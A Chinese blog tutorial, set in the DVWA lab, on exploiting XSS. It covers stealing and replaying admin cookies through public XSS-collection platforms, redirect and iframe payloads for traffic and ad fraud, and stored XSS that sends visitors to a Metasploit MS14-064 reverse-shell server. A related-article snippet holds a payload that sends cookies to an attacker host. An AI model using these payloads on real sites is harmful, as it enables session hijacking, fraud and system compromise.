XSS漏洞利用方式汇总

最新推荐文章于 2024-08-03 09:08:43 发布
最新推荐文章于 2024-08-03 09:08:43 发布
阅读量1.3w 收藏 109
点赞数 19
分类专栏: # Web安全 文章标签: xss xss攻击 跨站脚本攻击 xss攻击方式 cookie
学习之路长且漫,长情与君总会见!
本文链接:https://blog.csdn.net/Aaron_Miller/article/details/105918848
版权

文章目录

以下所有的针对XSS的利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作!!!

在这里插入图片描述

一、窃取Cookie

1.1 目的

  恶意攻击者通过XSS攻击,窃取其他账户的Cookie信息从而进行未授权非法操作。

1.2 实操

搭建xss平台

这里我直接百度一个xss平台来接Cookie

Tips:为了安全起见,建议使用自己搭建的XSS平台(如测试学习,不敏感的话随意)

》》注册一个测试账号(fengyue@126.com:fengyue123)
xss平台:

  • https://xss.pt
  • https://xsshs.cn
    在这里插入图片描述
    》》任意创建一个项目
    在这里插入图片描述
    在这里插入图片描述
    》》复制payload
    在这里插入图片描述
获取Cookie

》》这里我们使用靶场DVWA进行测试,在存在xss地方输入payload:

在这里插入图片描述
》》点击提交后即可在解cookie平台获取到当前账户的cookie和真实IP:
在这里插入图片描述
》》使用管理员的cookie登录系统(使用Chrome上的F12开发者工具,将拿到的Cookie值放入到Application中,浏览器输入跳转的目的地址回车便成功登录他人账户)
在这里插入图片描述

二、广告传播/SEO优化/刷取流量

2.1 目的

  通过恶意的JS代码将正常页面跳转到目的页面,利用网站进行重定向实现其引流、广告位传播等目的。

2.2 实操

2.2.1 恶意刷取访问量
网页直接跳转

(3种方式)

<script type="text/javascript">window.location.href="跳转的目的地址";</script>
<script type="text/javascript">window. location.replace("跳转的目的地址");</script>
<script type="text/javascript">window. location.assign("跳转的目的地址");</script>

》》为了体现效果,对靶机DVWA 存储型XSS处插入JS代码实现网页跳转:
(用户一访问到此页面就自动访问访问我博客的某一篇文章,访问量就+1)
在这里插入图片描述

网页延迟跳转

(网页停留三秒后再进行跳转)

<script type="text/javascript">
  function jumurl(){
  window.location.href = 'https://www.baidu.com';
  }
  setTimeout(jumurl,3000);
</script>
2.2.2 恶意广告展示

这里可以通过导入外链的方式对受害站点插入广告位,以来传播广告

<script>document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='2000' height='5000' allowTransparency src=https://blog.csdn.net/Aaron_Miller/article/details/105918848></iframe>");</script>

在这里插入图片描述

三、网页挂马/权限提升

3.1 目的

  通过木马服务器(kali)搭建生成一个恶意URL地址,并通过存储型XSS挂到页面中。只要存在未打相应补丁的用户访问了挂马页面,恶意攻击者便获取到了受害者的控制权限(重点在于目的系统是否打了相应补丁)

3.2 环境

  • 木马服务器(Kali  MS14-064  IP:192.168.7.129)
  • 受害者(Windows Server 2003 R2  IP:192.168.7.136)
  • 存在XSS的服务器(Win10 DVWA靶机 IP:192.168.1.103)

3.3 实操

3.3.1 生成木马URL

》》启动Metasploit
在这里插入图片描述
》》调用缓冲区溢出漏洞MS14-064(影响范围Win95-Win10,触发该漏洞条件要客户端装有power shell,详情见:微软官网
在这里插入图片描述
》》设置木马服务器IP,允许调用powsershell
在这里插入图片描述
》》调用反弹连接payload

Tips:reverse_tcp好处:靶机主动连接我们,不用担心靶机防火墙的问题

在这里插入图片描述
》》设置监听IP,使用默认监听端口4444,执行攻击(自动生成攻击地址)
在这里插入图片描述

3.3.2 XSS插入地址

》》恶意攻击者通过存储型xss将木马服务器生成的地址插入到网站中:

<script type="text/javascript">window.location.href="http://192.168.7.129:8080/W0fGq97a2ICU0
";</script>

在这里插入图片描述
》》当存在ms14-064漏洞的主机访问到该页面,攻击者就会获取到目的服务器操作系统的权限(如开启摄像头、添加用户、截屏、录音等)
(win2003r2模拟访问)
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

風月长情
关注
专栏目录
XSS总结
weixin_51356351的博客
11-19 1576
xss理解 1、简介 xss(cross site script)跨站脚本攻击,为了避免与css混淆,所以简称为xss。 2、什么是xss xss全称叫跨站脚本攻击,因为应用使用了js框架,因为应用未做任何防御措施,导致了攻击者使用对应的payload进行攻击,受害者运行了攻击者的payload,将攻击者所需的cookie发送给了攻击者,最本质的是服务器并没有完全过滤客户端提交的数据 3、xss的危害大吗? 答:很大,是现在web中主流的攻击方式。 4、xss攻击都可以导致哪些危害 (1)钓鱼欺骗 (2)网
xss漏洞利用
icecream_sheep的博客
11-15 1652
首先,我们先在文件夹找到www命名的文件夹里的html文件夹,在里面创建一个hack.php文件,输入这段代码, 然后,再创建一个submit.php文件 然后,打开一个浏览器访问 192.168.xx.xxx(你的虚拟机的IP)/submit.php,然后进入到这个界面 在这个界面输入"/><script>window.open("http://(填入你的IP)/hack.php?cookie="+document.cookie);</script&...
XSS漏洞及其原理(详解)
热门推荐
刘桂香263的博客
07-29 1万+
XSS被称为跨站脚本攻击(CrossSiteScripting),由于和层叠样式表(CascadingStyleSheets,CSS)重名,改为XSS。主要基于JavaScript语言进行恶意攻击,因为js非常灵活操作html、css、浏览器。
xss漏洞原理及利用【万字详解】
最新发布
2301_80064376的博客
08-03 1103
随着互联网技术的飞速发展,网络安全问题也日益凸显。在众多网络攻击方式中,跨站脚本攻击(Cross-Site Scripting, XSS)因其广泛性和高危性,成为了网络安全领域的一个重要研究课题。XSS 攻击通过在网页中注入恶意脚本,使攻击者能够窃取用户信息、劫持用户会话、篡改网页内容等,给用户和企业带来巨大的安全隐患。本文将深入探讨 XSS 漏洞的原理,并通过具体的实例演示如何复现这一漏洞,希望能帮助读者更好地理解和防范 XSS 攻击。
XSS漏洞的利用
LizePing_的博客
07-29 5042
XSS利用利用XSS窃取cookieXSS修改网页XSS获取用户信息XSS+CSRF 组合拳盲打XSS(Blind XSS)利用开启HttpOnly下的利用1.phpinfo页2.框架钓鱼3.跳转钓鱼4.历史密码5.获取源码6.通过xss伪造oauth等授权请求,远程登录其它 利用XSS窃取cookie 窃取cookiexss利用最常见的手段,攻击者有了cookie就相当于拥有了“管理员”身份。 通常需要配合xss平台来进行攻击,当被攻击者访问到有恶意代码的页面,他的cookie就会被发送到xss平台。
XSS漏洞利用方式总结
XunanSec的博客
05-21 4857
前言: 最近一直在挖漏洞,碰到的XSS漏洞最多了,今天就顺便来讲一下,如有错的地方,烦请指出。 00×1什么是XSS漏洞: XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 ​ 00×2 XSS漏洞有什么危害: 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 ...
xss漏洞利用方式总结
zlloveyouforever的博客
10-13 2664
XSS漏洞利用方式简单总结。有问题的同学请私信我,文章中网页挂马这一部分确实比较难实现。 此平台优点:界面布局清新、数据可阅读性好、IP获取准确、IP地址定位精准、轻量级(无需数据库)、对数据存储进行加密、GitHub开源方便与开发者交流(生命周期长)。 可以看到,BlueLotus平台还提供了一些js模板,便于我们参考或者构
【网络安全】XSS漏洞- XSS基础概述及利用
goldfish8848的博客
06-12 1363
跨站脚本(Cross-site Scripting)攻击,攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的(窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML中的CSS相混淆,通常称它为XSS
XSS利用方式
u011215939的博客
01-16 9024
前言 学习XSS注入很久了,XSS主要的情况三分天下:反射型、存储型、DOM型;今天要研究的是XSS利用,曾经有人问我XSS怎么利用的,我也只知道XSS在网页中嵌入代码,获取目标IP、Cookie,但是从来没有实践过,今天浏览FreeBuf时,发现一篇XSS利用文章,哈哈哈……于是乎,实践一下…… 准备 为了获取目标IP及ookie,实践开始之前,需要准备一个东西:VPS
XSS漏洞概述及使用
一颗小松子.的博客
01-23 1611
XSS 漏洞概述 简介 XSS作为OWASP TOP 10 之一 XSS被称为跨站脚本攻击(Cross-site scripting),本来应该缩写为CSS,但是由于和CSS(Cascading Style Sheets,层叠样式脚本)重名, 所以更名为XSSXSS(跨站脚本攻击) 主要基于javascript (JS) 完成恶意的攻击行为。 JS可以非常灵活的操作html,css和浏览器,这使得XSS攻击的"想象"空间特别大。 XSS通过将精心构造的代码(JS)代码注入到网页中,并由浏览器解释运
ctf xss利用_利用存储型XSS跨站漏洞偷取用户Cookie实战
weixin_42611310的博客
02-23 1622
声明 :严禁读者利用以下介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !攻击者要偷取Cookie , 就要让他们精心构造的恶意代码在受害者的计算机上运行 , 一般来说 , 是在用户访问一个网页的时候执行一段JavaScript代码 , 这段代码会...
XSS漏洞挖掘及利用教程
07-31
XSS漏洞挖掘及利用教程,还有大量QQ邮箱的XSS和各种XSS漏洞实战解析哦!
XSS利用文档
05-23
3. 测试与预防:使用XSS测试工具,如OWASP ZAP、Burp Suite等,可以帮助开发者发现并修复应用中的XSS漏洞。遵循Web开发最佳实践,如使用参数化查询、转义输出内容、启用HTTP头部的安全选项等,也可以有效预防XSS。 ...
漏洞报告模板.docx
10-02
- **验证结果**:明确展示漏洞利用的结果,如成功获取未授权数据的证明。 示例:“使用Burp Suite截获登录请求并修改其中的SQL语句后,能够从响应中获取到数据库返回的用户信息。” ##### 2.6 修复建议 针对发现...
Python实现XSS扫描_python xss扫描工具 xsslab,网络安全开发实用必备的几款插件
2401_84424257的博客
04-17 1116
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。# 此处为XSS的爆破字典,可以自行替换。最后就是大家最关心的网络安全面试题板块。
XSS和SQL注入
qq_45721890的博客
12-14 1205
实验三 XSS和SQL注入 说明:套用实验报告模板,红色部分无需复制到报告。 实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验原
XSS漏洞检测和利用
2401_84434570的博客
04-22 976
通过构造一些特殊的xss poc,在可能出现XSS漏洞测试点将这些语句传入网站,我们就能过够相对轻松的探测出XSS漏洞。
xss漏洞发现及利用
note.txt
04-01 3877
<br />漏洞描述:在使用标签(tag)进行浏览时,由于没有很好的过滤用户输入(tag关键字)造成xss跨站漏洞,用户自定义的版块tag搜索和全局tag搜索列表。<br /> 利用形式1:<br /> http://clin003.com/web2/?u=Club_talk_list&tag=<script>alert('111')</script><br /> 其中http://clin003.com/web2/为网站连接,Club_talk_list为用户自定义版块。<br />利用形式2:<b
xss 利用方式
07-30 813
漏洞原理   HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,<title>与</title>之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签引入了一段JavaScript脚本时,这些脚本...
修复存储式 XSS 漏洞的方式
03-22
修复存储式 XSS 漏洞的方式包括以下几种: 1. 对用户输入进行过滤和验证,确保输入的数据符合预期的格式和内容,避免恶意脚本的注入。 2. 对用户输入进行转义,将特殊字符转换为 HTML 实体,避免恶意脚本的执行。 3. 使用 CSP(Content Security Policy)限制页面中可以执行的脚本,防止恶意脚本的注入和执行。 4. 对于存储在数据库中的数据,使用 prepared statement 或者参数化查询,避免 SQL 注入攻击。 5. 定期更新和升级系统和组件,修复已知的漏洞,避免被攻击者利用已知漏洞进行攻击。 6. 对于敏感数据,使用加密算法进行加密存储,避免数据泄露。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

風月长情

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值